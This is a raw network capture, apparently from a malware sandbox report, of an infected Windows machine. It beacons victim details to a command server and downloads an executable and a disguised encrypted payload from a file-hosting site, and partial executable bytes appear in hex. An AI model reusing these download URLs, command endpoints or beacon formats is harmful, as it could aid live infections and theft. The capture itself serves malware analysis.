Jan 7, 2025 11:03:41.226413012 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:41 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
148	192.168.2.5	50126	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:41.422121048 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:41.427015066 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:41.941040993 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:41 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
149	192.168.2.5	50127	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:42.072987080 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:42.077853918 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:42.581815004 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:42 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49707	194.15.112.248	443	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-07 10:01:59 UTC	273	OUT	GET /rtBS?N HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: oshi.at Connection: Keep-Alive
2025-01-07 10:02:00 UTC	315	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 07 Jan 2025 10:02:00 GMT Content-Type: application/octet-stream Content-Length: 57976 Connection: close Last-Modified: Tue, 07 Jan 2025 09:18:52 GMT Accept-Ranges: bytes Content-Disposition: attachment; filename=JOHP.exe ETag: "83fa8ab5146bf537d9fabe59096863cf"
2025-01-07 10:02:00 UTC	3768	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 48 f1 7c 67 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 08 00 00 a8 00 00 00 0a 00 00 00 00 00 00 0e c6 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELH\|g @ `
2025-01-07 10:02:00 UTC	4096	IN	Data Raw: 00 00 00 02 03 0e 05 28 04 00 00 2b 2a 04 16 3c 08 00 00 00 07 10 02 38 11 00 00 00 04 07 3e 0a 00 00 00 02 04 0e 05 28 05 00 00 2b 2a 05 17 3c 03 00 00 00 17 10 03 03 06 59 0c 38 11 00 00 00 02 7b 06 00 00 04 08 17 6f 39 00 00 0a 08 05 58 0c 08 04 06 59 3e e6 ff ff ff 02 7b 07 00 00 04 03 3e 07 00 00 00 02 03 7d 07 00 00 04 08 06 05 59 58 0c 02 7b 08 00 00 04 08 3c 07 00 00 00 02 08 7d 08 00 00 04 0e 04 2a 00 00 00 13 30 04 00 27 00 00 00 09 00 00 11 73 3a 00 00 0a 0a 06 03 7d 3b 00 00 0a 06 02 7d 3c 00 00 0a 04 06 fe 06 3d 00 00 0a 73 95 00 00 06 6f 33 00 00 0a 2a 00 13 30 04 00 27 00 00 00 0a 00 00 11 73 3e 00 00 0a 0a 06 03 7d 3f 00 00 0a 06 02 7d 40 00 00 0a 04 06 fe 06 41 00 00 0a 73 95 00 00 06 6f 33 00 00 0a 2a 00 22 02 14 28 31 00 00 06 2a 00 00 Data Ascii: (+<8>(+<Y8{o9XY>{>}YX{<}0's:};}<=so30's>}?}@Aso3"(1
2025-01-07 10:02:00 UTC	4096	IN	Data Raw: ff ff ff 38 19 02 00 00 20 00 00 00 00 7e 94 00 00 04 7b 78 00 00 04 39 92 ff ff ff 26 20 00 00 00 00 38 87 ff ff ff 38 bd 01 00 00 20 05 00 00 00 7e 94 00 00 04 7b b2 00 00 04 3a 6e ff ff ff 26 20 00 00 00 00 38 63 ff ff ff 1b 8d 0c 00 00 01 25 16 72 58 04 00 70 a2 25 17 03 a2 25 18 72 5c 04 00 70 a2 25 19 11 04 a2 25 1a 72 22 04 00 70 a2 28 70 00 00 0a 73 19 00 00 06 7a 72 cc 04 00 70 1a 8d 01 00 00 01 25 16 03 a2 25 17 02 28 4e 00 00 06 13 01 12 01 28 71 00 00 0a a2 25 18 02 28 4f 00 00 06 13 01 12 01 28 71 00 00 0a a2 25 19 02 28 4d 00 00 06 13 02 12 02 fe 16 14 00 00 02 6f 26 00 00 0a a2 28 72 00 00 0a 73 19 00 00 06 7a 16 13 03 20 00 00 00 00 7e 94 00 00 04 7b 84 00 00 04 3a c4 fe ff ff 26 20 01 00 00 00 38 b9 fe ff ff 11 05 1f 39 3e 17 01 00 00 20 Data Ascii: 8 ~{x9& 88 ~{:n& 8c%rXp%%r\p%%r"p(pszrp%%(N(q%(O(q%(Mo&(rsz ~{:& 89>
2025-01-07 10:02:00 UTC	4096	IN	Data Raw: 00 00 00 00 7e 94 00 00 04 7b 5b 00 00 04 3a d3 ff ff ff 26 20 00 00 00 00 38 c8 ff ff ff 2a 00 1e 02 28 06 00 00 0a 2a 26 7e 3d 00 00 04 14 fe 01 2a 00 00 1a 7e 3d 00 00 04 2a 00 2e 73 7e 00 00 06 80 3e 00 00 04 2a 1e 02 28 06 00 00 0a 2a 0a 03 2a 00 1e 03 6f 96 00 00 06 7a 0a 03 2a 00 0a 14 2a 00 1e 02 28 06 00 00 0a 2a 13 30 05 00 be 00 00 00 16 00 00 11 20 01 00 00 00 fe 0e 01 00 38 00 00 00 00 fe 0c 01 00 45 03 00 00 00 66 00 00 00 3c 00 00 00 05 00 00 00 38 61 00 00 00 1b 8d 0c 00 00 01 25 16 72 58 04 00 70 a2 25 17 02 7b 9f 00 00 0a a2 25 18 72 9d 07 00 70 a2 25 19 11 00 a2 25 1a 72 22 04 00 70 a2 28 70 00 00 0a 73 19 00 00 06 2a 02 7b a0 00 00 0a 3a 2e 00 00 00 20 00 00 00 00 7e 94 00 00 04 7b a1 00 00 04 39 94 ff ff ff 26 20 00 00 00 00 38 89 ff Data Ascii: ~{[:& 8(&~=~=.s~>(oz(0 8Ef<8a%rXp%{%rp%%r"p(ps*{:. ~{9& 8
2025-01-07 10:02:00 UTC	4096	IN	Data Raw: 73 50 58 20 04 00 00 00 62 20 cd eb 52 4b 61 7d 7a 00 00 04 20 21 00 00 00 28 a2 00 00 06 3a 23 f6 ff ff 26 20 15 00 00 00 38 18 f6 ff ff 7e 94 00 00 04 20 02 db 83 d7 20 cb a5 b2 6e 58 20 d3 1e 2a 80 58 20 13 60 a9 f1 61 7d a6 00 00 04 20 08 00 00 00 38 ed f5 ff ff 7e 94 00 00 04 20 6d 15 4b 74 20 01 00 00 00 62 20 da 2a 96 e8 61 7d 65 00 00 04 20 0c 00 00 00 38 c8 f5 ff ff 7e 94 00 00 04 20 a7 b1 22 f8 20 03 00 00 00 62 20 38 8d 15 c1 61 7d 86 00 00 04 20 43 00 00 00 38 a3 f5 ff ff 7e 94 00 00 04 20 34 4b 83 85 20 06 00 00 00 62 20 00 cd d2 60 61 7d b7 00 00 04 20 6c 00 00 00 28 a3 00 00 06 39 79 f5 ff ff 26 20 4b 00 00 00 38 6e f5 ff ff 7e 94 00 00 04 20 fd 17 78 0e 65 20 03 e8 87 f1 61 7d 96 00 00 04 20 0f 00 00 00 28 a2 00 00 06 3a 49 f5 ff ff 26 20 Data Ascii: sPX b RKa}z !(:#& 8~ nX X `a} 8~ mKt b a}e 8~ " b 8a} C8~ 4K b `a} l(9y& K8n~ xe a} (:I&
2025-01-07 10:02:00 UTC	4096	IN	Data Raw: 10 00 76 02 00 00 05 00 49 00 8b 00 01 01 00 00 90 02 a4 02 0d 00 53 00 95 00 a1 00 00 00 b8 02 61 00 00 00 53 00 99 00 80 01 10 00 ca 02 33 01 05 00 53 00 9c 00 00 01 10 00 d2 02 00 00 05 00 56 00 9f 00 11 00 3e 05 ab 00 21 00 91 06 fb 00 21 00 a2 06 ff 00 13 00 b5 06 ab 00 13 00 a3 07 ab 00 21 00 38 08 ab 00 01 00 48 08 99 01 01 00 62 08 99 01 21 00 76 08 ab 00 11 00 89 08 ab 00 36 00 8b 0c e8 02 16 00 a0 0c ec 02 16 00 b0 0c f7 02 16 00 c0 0c ec 02 16 00 d5 0c f7 02 36 00 2b 09 03 02 16 00 18 09 f8 01 06 00 1f 0b 99 01 06 00 33 0b 9c 02 11 00 52 0d ab 00 06 00 81 0b 99 01 06 00 94 0b 9c 02 13 00 98 0d ab 00 36 00 52 0e ab 00 36 00 67 0e ab 00 36 00 75 0e ab 00 36 00 88 0e ab 00 36 00 9c 0e ab 00 36 00 ad 0e ab 00 31 00 bf 0e ab 00 31 00 d5 0e ab 00 21 Data Ascii: vISaS3SV>!!!8Hb!v66+3R6R6g6u66611!
2025-01-07 10:02:00 UTC	4096	IN	Data Raw: 00 00 01 00 99 0f 00 00 02 00 db 0d 00 00 01 00 76 09 00 00 01 00 96 14 00 00 02 00 a0 14 00 00 01 00 b8 14 00 00 02 00 bc 14 00 00 03 00 c4 14 00 00 01 00 46 0c 00 00 02 00 b1 10 00 00 03 00 d4 14 00 00 04 00 dd 14 00 00 01 00 c8 0b 00 00 02 00 bc 14 00 00 03 00 d4 14 00 00 04 00 92 15 00 00 05 00 98 15 00 00 06 00 a2 15 00 00 01 00 bf 15 00 00 02 00 c0 07 00 00 01 00 da 09 00 00 01 00 f0 15 00 00 02 00 f6 15 00 00 01 00 91 09 00 00 02 00 c2 08 00 00 01 00 4c 17 00 00 01 00 ee 09 00 00 01 00 18 0d 00 00 01 00 ee 09 00 00 01 00 50 0d 00 00 01 00 ee 09 00 00 01 00 18 0d 00 00 01 00 44 18 00 00 01 00 ee 09 00 00 02 00 2e 10 00 00 01 00 31 0e 00 00 02 00 3a 0e 00 00 01 00 4b 0e 00 00 01 00 f0 1a 00 00 01 00 f9 1a 0a 00 70 00 10 00 e1 00 1a 00 ae 00 1a 00 01 Data Ascii: vFLPD.1:Kp
2025-01-07 10:02:00 UTC	4096	IN	Data Raw: 6c 73 00 76 61 6c 75 65 00 45 71 75 61 6c 69 74 79 43 6f 6d 70 61 72 65 72 60 31 00 67 65 74 5f 44 65 66 61 75 6c 74 00 47 65 74 48 61 73 68 43 6f 64 65 00 54 6f 53 74 72 69 6e 67 00 46 6f 72 6d 61 74 00 49 46 6f 72 6d 61 74 50 72 6f 76 69 64 65 72 00 43 68 65 63 6b 53 65 70 61 72 61 74 65 64 41 64 61 70 74 65 72 00 56 69 73 69 74 49 6e 73 70 65 63 74 6f 72 00 3c 45 72 72 6f 72 50 72 6f 76 69 64 65 72 3e 6a 5f 5f 54 50 61 72 00 3c 56 61 6c 75 65 3e 6a 5f 5f 54 50 61 72 00 41 6e 61 6c 79 7a 65 53 6f 72 74 65 64 53 70 65 63 00 73 65 74 75 70 00 69 6e 66 6f 00 73 65 63 6f 6e 64 00 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 49 6e 66 6f 00 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 00 66 69 72 73 74 00 53 74 72 65 61 6d 69 Data Ascii: lsvalueEqualityComparer`1get_DefaultGetHashCodeToStringFormatIFormatProviderCheckSeparatedAdapterVisitInspector<ErrorProvider>j__TPar<Value>j__TParAnalyzeSortedSpecsetupinfosecondSerializationInfoSystem.Runtime.SerializationfirstStreami
2025-01-07 10:02:00 UTC	676	IN	Data Raw: 72 49 6e 74 65 72 70 72 65 74 65 72 00 43 6f 75 6e 74 54 6f 6b 65 6e 69 7a 65 72 00 52 65 76 69 65 77 53 74 61 74 65 6c 65 73 73 41 75 64 69 74 6f 72 00 52 65 76 69 65 77 4c 69 74 65 72 61 6c 41 75 64 69 74 6f 72 00 61 70 70 6c 79 73 70 65 63 00 46 69 6e 64 53 70 65 63 00 41 6e 61 6c 79 7a 65 56 69 73 75 61 6c 53 6f 6c 76 65 72 00 6d 5f 53 65 67 6d 65 6e 74 65 64 49 74 65 72 61 74 6f 72 00 5f 41 6c 70 68 61 62 65 74 69 63 45 6e 75 6d 65 72 61 74 6f 72 00 6d 5f 41 75 64 69 74 6f 72 54 6f 6b 65 6e 69 7a 65 72 00 5f 50 72 6f 6a 65 63 74 53 6f 72 74 65 72 00 5f 4e 6f 64 65 43 61 63 68 65 00 57 72 69 74 65 41 75 64 69 74 6f 72 00 52 65 76 69 65 77 49 74 65 72 61 62 6c 65 41 75 64 69 74 6f 72 00 52 65 73 74 61 72 74 41 75 64 69 74 6f 72 00 41 6e 61 6c 79 7a 65 Data Ascii: rInterpreterCountTokenizerReviewStatelessAuditorReviewLiteralAuditorapplyspecFindSpecAnalyzeVisualSolverm_SegmentedIterator_AlphabeticEnumeratorm_AuditorTokenizer_ProjectSorter_NodeCacheWriteAuditorReviewIterableAuditorRestartAuditorAnalyze
2025-01-07 10:02:00 UTC	4096	IN	Data Raw: 74 53 75 70 70 6f 72 74 65 64 45 78 63 65 70 74 69 6f 6e 00 53 79 73 74 65 6d 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 2e 49 45 6e 75 6d 65 72 61 74 6f 72 2e 67 65 74 5f 43 75 72 72 65 6e 74 00 53 79 73 74 65 6d 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 2e 47 65 6e 65 72 69 63 2e 49 45 6e 75 6d 65 72 61 62 6c 65 3c 53 79 73 74 65 6d 2e 44 61 74 65 54 69 6d 65 3e 2e 47 65 74 45 6e 75 6d 65 72 61 74 6f 72 00 53 79 73 74 65 6d 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 2e 49 45 6e 75 6d 65 72 61 62 6c 65 2e 47 65 74 45 6e 75 6d 65 72 61 74 6f 72 00 49 45 6e 75 6d 65 72 61 62 6c 65 00 46 69 6e 69 73 68 52 65 61 64 61 62 6c 65 49 6e 73 70 65 63 74 6f 72 00 53 74 6f 70 4d 61 70 70 65 72 00 53 79 73 74 65 6d 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 2e 47 65 6e 65 72 69 63 2e 49 45 6e Data Ascii: tSupportedExceptionSystem.Collections.IEnumerator.get_CurrentSystem.Collections.Generic.IEnumerable<System.DateTime>.GetEnumeratorSystem.Collections.IEnumerable.GetEnumeratorIEnumerableFinishReadableInspectorStopMapperSystem.Collections.Generic.IEn

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49713	194.15.112.248	443	6552	C:\Users\user\AppData\Roaming\Dhy2kmz.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-07 10:02:02 UTC	186	OUT	GET /BLZu HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Host: oshi.at Connection: Keep-Alive
2025-01-07 10:02:03 UTC	308	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 07 Jan 2025 10:02:03 GMT Content-Type: application/pdf Content-Length: 1691144 Connection: close Accept-Ranges: bytes Last-Modified: Tue, 07 Jan 2025 09:16:51 GMT Content-Disposition: attachment; filename=wfFz.pdf ETag: "085f1877234f1fc3e64a1fb7d3d8e87f"
2025-01-07 10:02:03 UTC	3775	IN	Data Raw: 18 b8 9f 15 1d c6 05 54 e2 1d bf b3 43 f4 40 fd ba d6 44 c9 70 38 88 83 c4 c5 f6 37 44 7a 19 b5 71 c1 4e 47 52 29 c7 10 95 6a ad ca 5d 14 4c a0 7a 3e c9 c7 03 9a a7 a0 56 a8 86 7f bd 0d 99 49 4a b1 6a c0 90 12 8f 40 ae 40 ec af f6 23 bc f4 6f 03 f2 b6 de 65 f4 17 cb 3a 3d c9 96 44 c8 08 32 18 5c 7c c0 92 74 cf 2d 0c 28 25 5c 6f 79 fc ad 04 9f 4d 39 fc 0a 00 06 44 9f 65 f7 9d e0 b9 b0 08 87 51 ce 60 8f 79 d1 ad 22 b8 3a 8d 6e 0c ce 10 d9 e4 5b 1c 57 2b 22 75 9b fd 3e 84 2c 2d 7d 40 84 4b 1d 80 9f 3d 8b d2 e3 cc 95 d7 aa 06 53 03 9d 95 71 83 b6 ad d5 00 52 ec e9 13 c2 28 6d fe 40 b8 6e 09 26 ca 20 38 18 bf 8f dd 67 63 fc ac 40 30 b1 cc 22 48 0d 8e 71 5e 33 71 a1 b8 43 b3 74 14 18 51 86 67 f4 20 7a c1 a8 4c 73 e9 d9 c5 cb 1b 83 b2 a9 6e 59 93 34 ce 18 92 23 Data Ascii: TC@Dp87DzqNGR)j]Lz>VIJj@@#oe:=D2\\|t-(%\oyM9DeQ`y":n[W+"u>,-}@K=SqR(m@n& 8gc@0"Hq^3qCtQg zLsnY4#
2025-01-07 10:02:03 UTC	4096	IN	Data Raw: 73 b1 69 29 cb 33 c6 cb 50 bc cd 36 c9 8d 4c 4e df bf 6c b0 1a 38 a0 ef 8f c9 1f 02 3a 7a 9a 7f 0a 48 54 ec 50 f9 e2 80 52 3f 6c 8d c5 58 45 eb 38 19 39 d0 dd 92 5b 06 7a e6 99 0a 5b e3 b9 f6 29 64 75 1a a4 2d 40 dd 3c dd 09 80 91 d4 e6 10 0c 02 65 80 9b a7 56 24 3c b7 3f 13 49 91 ac af cb 89 bf 28 af b2 cd 15 bc bd d5 3c 2f 58 cb 12 fe 80 f4 dd fe c0 94 38 c9 ea 23 dc 55 89 c2 63 b2 c4 ec 9b 94 73 7b b7 58 b5 78 ef 8c 8b 78 31 5b 34 22 8c 85 21 98 52 f1 4c 93 66 a6 78 ab d8 6d 81 08 c1 81 e8 e5 c2 66 4b 01 0f 6f 61 cb e6 a1 9d b0 47 38 cb 53 90 bd 3f 3a f3 6f a4 55 28 e8 be a1 3e ff 7d 5f d4 52 13 03 db fd b6 aa 76 30 1e 8e c3 6e ba 77 54 25 2c 42 8e 01 08 4a 7a b0 57 08 22 72 c9 15 20 c5 fc 6d 02 37 1e e4 d0 55 55 f2 70 6b f5 43 b1 68 69 53 a9 fe 1a 0a Data Ascii: si)3P6LNl8:zHTPR?lXE89[z[)du-@<eV$<?I(</X8#Ucs{Xxx1[4"!RLfxmfKoaG8S?:oU(>}_Rv0nwT%,BJzW"r m7UUpkChiS
2025-01-07 10:02:03 UTC	4096	IN	Data Raw: e2 4d 46 0e b9 bb 35 2d 90 17 81 8b 6d 7e 76 c6 13 33 90 cb d4 ee 5b 4e 78 10 58 eb 00 95 44 a7 14 3c 57 78 2d ae 3a 99 27 75 56 a7 48 18 8a 90 8d 97 8f 99 25 0a 5f 62 04 39 9f 2d 7a be cb 86 dc a7 cf 50 91 d8 c4 1b bc 35 fe 25 22 24 9f 92 6b 30 47 76 06 8f b1 5b 2d 60 f8 de 32 aa 57 79 d5 9e 63 63 19 4e c4 c9 ac 13 af a3 cc a4 bd 60 5b 8f d0 42 da b1 4f 26 42 19 96 73 56 14 f7 7b fa d9 23 58 ce 30 48 71 53 bc bf 52 73 21 cb 78 ae c3 76 ac 1f 01 6f 5a d4 b5 b5 1c e8 69 37 ae 9a e0 c0 72 d2 c1 65 be b9 1a 0b 03 2a c4 db fd e4 b6 9c 94 4c e7 e8 9b 50 af 2c fd 70 86 e2 7f c6 3d a6 36 c7 0c 21 65 62 48 90 b0 a1 b9 74 e7 eb 5b f5 f4 3b c9 97 5f f6 b7 e0 45 25 ad 8b a9 09 d4 fb ab 57 3f 07 d6 a8 05 01 3f 4c d5 d6 1b 38 af ac 5e 59 10 35 00 d5 45 7d 56 58 65 ef Data Ascii: MF5-m~v3[NxXD<Wx-:'uVH%_b9-zP5%"$k0Gv[-`2WyccN`[BO&BsV{#X0HqSRs!xvoZi7re*LP,p=6!ebHt[;_E%W??L8^Y5E}VXe
2025-01-07 10:02:03 UTC	4096	IN	Data Raw: f3 a2 4f e5 70 ae 5f 02 cb 5c 88 36 28 91 bf c8 ad bf 11 ee 28 8b d4 90 82 4e ab 4a 2b d0 f0 01 97 02 44 a9 9e c3 f9 5c 87 29 f3 56 bb 07 5d e8 84 51 aa fa e1 7d 82 6e 0a 84 c9 25 f1 7d b0 0e c9 36 7c a0 79 a7 8f af be 69 43 f9 c5 9d f9 e2 17 52 1b 0d 2c 4a 5d 22 f0 bd 24 e8 ce 33 79 8f b4 b8 06 7e e5 45 75 6e ae a7 59 da 91 5e 63 92 25 88 cf be d5 67 29 20 a9 97 58 df ec 85 7b 22 4d 07 52 1b a6 7e 15 8c 06 b3 f6 0e 67 15 85 cd bb af fd f3 78 81 f5 6b 61 0b bd 69 b2 5a e5 1a dd 7e 1d e5 08 28 95 5b dc ca 6f 01 9e 31 53 13 69 44 c9 c3 2c 68 f1 7e 75 1a 09 27 bd ff 7a 8e 49 ad 80 00 97 3d 65 4b 38 f3 04 a3 bf 88 ed 52 c9 2f 66 47 47 2e 84 61 0e d8 17 f6 e5 ac 89 f1 63 6b cb b0 eb d3 0f 12 6b e8 6b 9e 02 4d b3 ed 0f 7a 92 eb d3 8b f7 57 d0 25 13 15 c9 2f fa Data Ascii: Op_\6((NJ+D\)V]Q}n%}6\|yiCR,J]"$3y~EunY^c%g) X{"MR~gxkaiZ~([o1SiD,h~u'zI=eK8R/fGG.ackkkMzW%/
2025-01-07 10:02:03 UTC	4096	IN	Data Raw: 0f dd 6f 74 d8 c9 b9 60 f5 06 5e af 2c 46 8c 31 2d 0f 97 a1 65 c3 72 a0 b3 85 c8 25 82 3d b3 79 e2 d2 4c df eb c3 c3 69 55 6b f6 fc 33 ce a2 da 45 44 18 55 7a 8a fe 80 8d 4a 9c b1 0f 15 19 da c6 e7 17 2b 74 ec 6a eb 13 0d 19 5c 70 57 9b b3 ea df 5c 66 99 7b 15 20 0b ca 03 f4 2b 32 da cc 7d bc 83 26 4c 28 01 5c 5b 68 0f 0a eb 51 38 3f 89 95 d5 71 27 1e ab 37 c9 96 57 84 77 28 a1 33 8c 19 0a e0 4e e0 14 d3 dc d7 9a 83 f7 5b 3e c4 ed 53 d9 f3 a4 33 ea c0 a4 9e d7 9d 00 ea d8 49 cf be ae b1 19 7b 8e 9b 10 94 a3 f1 a6 3d 39 18 36 7b 77 cc 14 26 96 d1 57 98 48 a8 f4 c6 77 9f cf 53 d3 ee b6 ec b8 eb 15 82 3c 52 d3 8a ac 68 0a 84 a4 7a 0e c4 11 bd 4c d5 d0 83 18 07 b3 68 01 26 e1 e6 a3 45 c3 a6 e7 76 69 5e aa bf 42 72 5c bb 08 e2 12 7f e1 96 24 c4 61 39 0e 44 e4 Data Ascii: ot`^,F1-er%=yLiUk3EDUzJ+tj\pW\f{ +2}&L(\[hQ8?q'7Ww(3N[>S3I{=96{w&WHwS<RhzLh&Evi^Br\$a9D
2025-01-07 10:02:03 UTC	4096	IN	Data Raw: 7b 34 19 00 2f 03 b8 b9 73 63 f6 6d 58 3b 6d 56 dd 15 7e 9b 30 e3 bd 73 8b c9 5d 43 18 a9 10 37 ca 1f 3c a2 1f cf 35 1b eb ee 0a 96 a7 d8 10 fd f8 ee 1a 53 0a d2 35 d6 73 a1 9b d6 19 75 1a 12 d7 98 8f 8b 96 f8 d2 39 8a cf aa 93 f0 c7 fc db b4 4c c0 63 b9 9e 57 a0 d9 a9 46 36 18 54 80 c7 e3 c5 e3 23 a4 ba 23 1c 53 a6 78 26 d7 67 27 7b a1 91 77 1e 86 dd dd 0f d7 ff d6 86 ce 80 b0 89 3c 0e 82 a4 20 f6 3c 6a 52 c6 b9 f6 69 eb 57 e0 ef b8 22 f2 f9 3b fc 92 90 9a 4e f2 02 1f 88 14 fc f6 9f 66 2e a2 33 8f 0f df 7d 74 84 5b ac ee eb 1b 4e 7f f5 30 51 be 77 30 ee 5c 3d 66 87 d1 d4 7b 39 90 7b 57 7e 3c a2 e1 6a 27 02 13 d9 94 d9 20 5b 36 52 e2 e2 8d e1 8a 6c dc 62 3c 16 85 c4 f3 a0 4e eb 64 b0 f4 c0 54 ef 2d 8a fd 40 1c 75 82 c5 66 a4 28 99 41 92 29 e5 22 d1 db 52 Data Ascii: {4/scmX;mV~0s]C7<5S5su9LcWF6T##Sx&g'{w< <jRiW";Nf.3}t[N0Qw0\=f{9{W~<j' [6Rlb<NdT-@uf(A)"R
2025-01-07 10:02:03 UTC	4096	IN	Data Raw: da 68 8d 95 12 df f1 58 fb a4 71 1a 65 74 bc 3d 7d a2 f4 cb 52 89 24 89 4c c7 66 92 83 92 e7 cc c1 bd 7f bc c4 ea 2d ca 21 f3 3c 0b c1 6d 2d 07 94 1f d0 09 f4 89 f5 f2 64 ca ab 13 9b b6 14 7b 27 ee bf 3d 0f d2 04 89 33 50 af 49 40 19 c5 a9 01 c9 5e 91 7d 30 14 44 c2 95 53 fb 09 55 54 14 70 dd a9 59 a1 17 2e f7 7c 5b d2 4a d6 ba b9 0c cf 98 a0 b1 5d 49 f6 d1 fd 73 dd d8 fd df ef ca df 51 cc 3a 93 63 e3 58 81 cd c5 41 be b7 65 97 75 5b 06 78 8a 06 d2 dc 61 91 30 5c fa 25 7d dc 6c e4 a0 5b 72 f5 0f da 7f 28 2d 5c f1 18 62 fc 2f bc be 6d 8f 40 44 98 e4 39 d7 74 dd 77 ec ed 96 3b 5a e8 ea 98 75 5a af 97 4d f9 3b f5 2e 08 13 d4 00 c7 19 f2 80 79 90 2f 83 62 21 fd 7c 2c f3 56 c7 d8 51 bd 43 fc 60 2f 49 5d 94 3a bb a3 1e 46 fb ce c1 79 61 e4 23 10 ee 0b c5 95 36 Data Ascii: hXqet=}R$Lf-!<m-d{'=3PI@^}0DSUTpY.\|[J]IsQ:cXAeu[xa0\%}l[r(-\b/m@D9tw;ZuZM;.y/b!\|,VQC`/I]:Fya#6
